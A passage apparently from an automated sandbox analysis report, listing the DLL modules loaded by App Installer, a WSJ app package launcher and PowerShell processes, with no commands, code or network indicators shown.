Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.applicationmodel.background.systemeventsbroker.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: biwinrt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositoryclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.xaml.controls.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: uiamanager.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.core.textinput.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: winrttracing.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.applicationmodel.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: directmanipulation.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: daxexec.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: container.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: profext.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appcontracts.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxpackaging.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptxml.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: webservices.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptowinrt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: certenroll.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dsparse.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: threadpoolwinrt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.networking.connectivity.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: installservice.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: rometadata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.storage.applicationdata.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: appcontracts.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.applicationmodel.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: ondemandbrokerclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: psfruntime64.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: daxexec.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: container.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: capauthz.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
